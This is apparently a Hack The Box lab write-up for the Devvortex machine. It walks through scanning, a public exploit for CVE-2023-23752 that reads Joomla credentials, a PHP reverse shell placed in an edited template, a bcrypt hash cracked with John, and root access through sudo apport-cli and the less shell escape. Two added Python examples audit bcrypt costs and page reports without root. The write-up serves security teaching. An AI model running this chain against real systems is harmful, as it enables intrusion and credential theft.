Devvortex
https://app.hackthebox.com/machines/Devvortex
Port scan
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBH2y17GUe6keBxOcBGNkWsliFwTRwUtQB3NXEhTAFLziGDfCgBV7B9Hp6GQMPGQXqMk7nnveA8vUz0D7ug5n04A=
| 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKfXa+OM5/utlol5mJajysEsV4zb/L0BJ1lKxMPadPvR
80/tcp open http syn-ack
|_http-title: DevVortex
| http-methods:
|_ Supported Methods: GET HEAD
Subdomain scan
└─➜ ffuf -u http://devvortex.htb/ -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.devvortex.htb' -ac [0]
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0
________________________________________________
:: Method : GET
:: URL : http://devvortex.htb/
:: Wordlist : FUZZ: /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.devvortex.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
[Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 8233ms]
* FUZZ: dev
:: Progress: [4989/4989] :: Job [1/1] :: 102 req/sec :: Duration: [0:00:48] :: Errors: 0 ::
Let's add this to our /etc/hosts file.
Directory scan (on subdomain)
└─➜ ffuf -u http://dev.devvortex.htb/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt -ac -e .php [0]
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0
________________________________________________
:: Method : GET
:: URL : http://dev.devvortex.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
:: Extensions : .php
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
[Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 358ms]
* FUZZ: administrator
[Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 470ms]
* FUZZ: api
<-SNIPPED->
:: Progress: [40952/40952] :: Job [1/1] :: 61 req/sec :: Duration: [0:10:38] :: Errors: 0 ::
Web Exploitation (www-data)
I found this beautiful exploit for CVE-2023-23752 that does our work. The bug is an improper access check in Joomla's web services API (fixed in 4.2.8): an unauthenticated request can read the site configuration, database credentials included.
https://github.com/AlissoftCodes/CVE-2023-23752
Creds
└─➜ python3 juid.py -a http://dev.devvortex.htb/ [0]
[USERS]
Name: lewis
ID: 649
Username: lewis
Email: lewis@devvortex.htb
Register date: 2023-09-25 16:44:24
Group name: Super Users
Able to send e-mail: Yes
Name: logan paul
ID: 650
Username: logan
Email: logan@devvortex.htb
Register date: 2023-09-26 19:15:42
Group name: Registered
Able to send e-mail: No
[CONFIGS]
Database type: mysqli
Host: localhost
User: lewis
Password: <--SNIPPED-->
Database: joomla
Database prefix: sd4fg_
Encryption: 0
Running that script gives us the credentials, so we can now log in to the app.
After logging in, go to System > Templates (http://dev.devvortex.htb/administrator/index.php?option=com_templates&view=templates&client_id=0) and edit a template file to get a reverse shell. Since the template files are .php, we can use the pentestmonkey PHP reverse shell. I edited error.php with the reverse shell and got a shell as www-data.
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
User shell
I searched almost every file for a way to a user shell; none of them panned out.
Logging in to MySQL with the creds we found earlier worked:
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| joomla |
| performance_schema |
+--------------------+
3 rows in set (0.00 sec)
Let's use the joomla one:
mysql> use joomla;
Database changed
mysql> show tables;
+-------------------------------+
| Tables_in_joomla |
+-------------------------------+
| sd4fg_action_log_config |
| sd4fg_action_logs |
<-SNIPPED->
| sd4fg_users |
<-SNIPPED->
+-------------------------------+
71 rows in set (0.00 sec)
mysql> select * from sd4fg_users;
+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+
| id | name | username | email | password | block | sendEmail | registerDate | lastvisitDate | activation | params | lastResetTime | resetCount | otpKey | otep | requireReset | authProvider |
+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+
| 649 | lewis | lewis | lewis@devvortex.htb | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u | 0 | 1 | 2023-09-25 16:44:24 | 2023-11-26 03:50:43 | 0 | | NULL | 0 | | | 0 | |
| 650 | logan paul | logan | logan@devvortex.htb | $2y$10$I <-SNIPPED-> Niy/yBtkIj12 | 0 | 0 | 2023-09-26 19:15:42 | NULL | | {"admin_style":"","admin_language":"","language":"","editor":"","timezone":"","a11y_mono":"0","a11y_contrast":"0","a11y_highlight":"0","a11y_font":"0"} | NULL | 0 | | | 0 | |
+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+
2 rows in set (0.00 sec)
mysql>
Voila, we got logan's hash.
Let's crack it with John:
┌─[ ~/stuff/htb/DevVortex] [ 10.10.16.9]
└─➜ john --wordlist=/usr/share/wordlists/rockyou.txt logan.hash [0]
Warning: detected hash type "bcrypt", but the string is also recognized as "bcrypt-opencl"
Use the "--format=bcrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<SNIPPED> (?)
1g 0:00:00:03 DONE (2023-11-26 09:35) 0.3205g/s 461.5p/s 461.5c/s 461.5C/s winston..michel
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Done! Now SSH in as logan and grab user.txt.
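A small added example (mine, not part of the original post and not john's code) that explains the john line "Cost 1 (iteration count) is 1024": the two-digit cost after the second $ in a bcrypt string is log2 of the number of expansion rounds, so $2y$10$ means 2**10 = 1024. The parser below splits a bcrypt string into its fields and audits a list of (username, hash) rows in the shape of the sd4fg_users dump for work factors below a policy threshold. lewis's hash is the one shown in the dump above; the other two rows and the threshold of 12 are assumptions for the example.

```python
"""Inspect bcrypt hashes from a users table and flag weak work factors.

Added example for this writeup; not the original post's code and not john's.
"""
import re

# Modular-crypt layout of a bcrypt string (60 chars in total):
#   $<variant>$<cost>$<22-char salt><31-char digest>
_BCRYPT_RE = re.compile(
    r"^\$(?P<variant>2[abxy]?)\$(?P<cost>\d{2})\$"
    r"(?P<salt>[./A-Za-z0-9]{22})(?P<digest>[./A-Za-z0-9]{31})$"
)

# Policy threshold for this example (assumption): flag costs below 12 so they
# get raised on the next password change.
RECOMMENDED_MIN_COST = 12


def parse_bcrypt(hash_str):
    """Split a bcrypt string into its fields; raise ValueError if it is not one."""
    m = _BCRYPT_RE.match(hash_str)
    if not m:
        raise ValueError("not a bcrypt modular-crypt string")
    cost = int(m.group("cost"))
    if not 4 <= cost <= 31:          # the range bcrypt implementations accept
        raise ValueError(f"bcrypt cost {cost} outside 4..31")
    return {
        "variant": m.group("variant"),
        "cost": cost,
        "iterations": 1 << cost,     # what john prints as "iteration count"
        "salt": m.group("salt"),
        "digest": m.group("digest"),
    }


def weak_cost_users(rows, minimum_cost=RECOMMENDED_MIN_COST):
    """Return (weak, not_bcrypt): usernames whose bcrypt cost is below
    minimum_cost, and usernames whose stored hash is not bcrypt at all
    (legacy or malformed hashes deserve a look too)."""
    weak, not_bcrypt = [], []
    for username, password_hash in rows:
        try:
            info = parse_bcrypt(password_hash)
        except ValueError:
            not_bcrypt.append(username)
            continue
        if info["cost"] < minimum_cost:
            weak.append(username)
    return weak, not_bcrypt


# Sample rows in the shape of the sd4fg_users dump: (username, password).
# lewis's hash is taken from the dump above; alice and legacy are constructed
# (legacy's value is the MD5 of "password").
SAMPLE_ROWS = [
    ("lewis", "$2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u"),
    ("alice", "$2b$12$" + "abcdefghijklmnopqrstuv" + "ABCDEFGHIJKLMNOPQRSTUVWXYZ01234"),
    ("legacy", "5f4dcc3b5aa765d61d8327deb882cf99"),
]

if __name__ == "__main__":
    name, h = SAMPLE_ROWS[0]
    info = parse_bcrypt(h)
    print(f"{name}: bcrypt variant {info['variant']}, cost {info['cost']} "
          f"(2**{info['cost']} = {info['iterations']} iterations)")
    print("below policy cost / not bcrypt:", weak_cost_users(SAMPLE_ROWS))
```

Each extra unit of cost doubles the work for both the server and the cracker, so the cost field is the one knob in that hash string that actually slows down a run like the one above; the salt only stops precomputation.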
Root Shell
sudo -l
Last login: Tue Nov 21 10:53:48 2023 from 10.10.14.23
logan@devvortex:~$ sudo -l
[sudo] password for logan:
Matching Defaults entries for logan on devvortex:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User logan may run the following commands on devvortex:
(ALL : ALL) /usr/bin/apport-cli
Hmmm, after googling, I found this:
https://github.com/canonical/apport/commit/e5f78cc89f1f5888b6a56b785dddcb0364c48ecb
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/2016023
The short version: when apport-cli is run through sudo it opens the report in the pager as root, and less can spawn a shell. Let's create our own file, generate a report for it & grab the root shell :)
Exploitation
logan@devvortex:/tmp$ echo 'test' > pwn.sh
logan@devvortex:/tmp$ chmod +x pwn.sh
logan@devvortex:/tmp$ sudo apport-cli -c pwn.sh less
*** Collecting problem information
The collected information can be sent to the developers to improve the
application. This might take a few minutes.
..............
*** Send problem report to the developers?
After the problem report has been sent, please fill out the form in the
automatically opened web browser.
What would you like to do? Your options are:
S: Send report (1.6 KB)
V: View report
K: Keep report file for sending later or copying to somewhere else
I: Cancel and ignore future crashes of this program version
C: Cancel
Please choose (S/V/K/I/C): V
<The report opens in less; at the less prompt type "!sh" and you get a shell, which is root because apport-cli was started with sudo>
# id
uid=0(root) gid=0(root) groups=0(root)
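For the defender's side of this, here is an added example (mine, not apport's code and not the exact change in the commit linked above) of the least-privilege pattern that class of fix relies on. A tool started through sudo inherits uid 0, and if it execs less as uid 0 the user can type "!sh" at the pager prompt and get a root shell. The child below drops to the invoking user, which sudo records in SUDO_UID and SUDO_GID, before exec; refuses to page as root when there is nobody to drop to; and sets LESSSECURE=1 so less disables shell escapes as defence in depth. SUDO_UID, SUDO_GID and LESSSECURE are real variables; the function names and the $PAGER-or-less selection are this example's own assumptions.

```python
"""Hand a report to an interactive pager without running the pager as root.

Added example for this writeup; not apport's code.
"""
import os
import subprocess


def invoking_user_ids(environ, euid):
    """Return (uid, gid) to drop to, or None if no drop applies.

    None means either we are not root (nothing to drop) or sudo did not
    record a non-root invoker (the caller must then fail closed).
    """
    if euid != 0:
        return None
    try:
        uid = int(environ["SUDO_UID"])
        gid = int(environ["SUDO_GID"])
    except (KeyError, ValueError):
        return None
    if uid == 0:
        return None
    return uid, gid


def hardened_pager_env(environ):
    """Copy of the environment with shell escapes in less switched off."""
    env = dict(environ)
    env["LESSSECURE"] = "1"   # less secure mode: no "!" commands, no "|", no editor
    return env


def pager_argv(environ):
    """Pager selection (assumption for this example): $PAGER if set, else less."""
    return (environ.get("PAGER") or "less").split()


def view_report(report_path, environ=None, euid=None):
    """Open report_path in the pager as the invoking user, never as root.

    The report file must be readable by that user (written 0644 or chowned
    to them first); that is the caller's job here.
    """
    environ = dict(os.environ) if environ is None else environ
    euid = os.geteuid() if euid is None else euid
    ids = invoking_user_ids(environ, euid)
    if euid == 0 and ids is None:
        raise PermissionError(
            "refusing to run an interactive pager as root with no invoking user to drop to")

    def drop_privileges():
        # Runs in the child between fork and exec. Order matters: supplementary
        # groups and gid first, uid last, otherwise the later calls fail.
        uid, gid = ids
        os.setgroups([])
        os.setgid(gid)
        os.setuid(uid)

    return subprocess.run(
        pager_argv(environ) + [report_path],
        env=hardened_pager_env(environ),
        preexec_fn=drop_privileges if ids else None,
    ).returncode


if __name__ == "__main__":
    # Example call (constructed): when run via sudo this pages as the invoker,
    # when run as a normal user it pages as that user, as root without sudo it refuses.
    print(view_report("/tmp/example-report.txt"))
```

The same reasoning applies to any sudoers entry that hands root to a program with an interactive pager, editor or shell escape: the rule itself ("(ALL : ALL) /usr/bin/apport-cli") is the finding, and patching the pager launch is only half of the fix if the rule stays that broad.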
pwned ^^
heapbytes's still pwning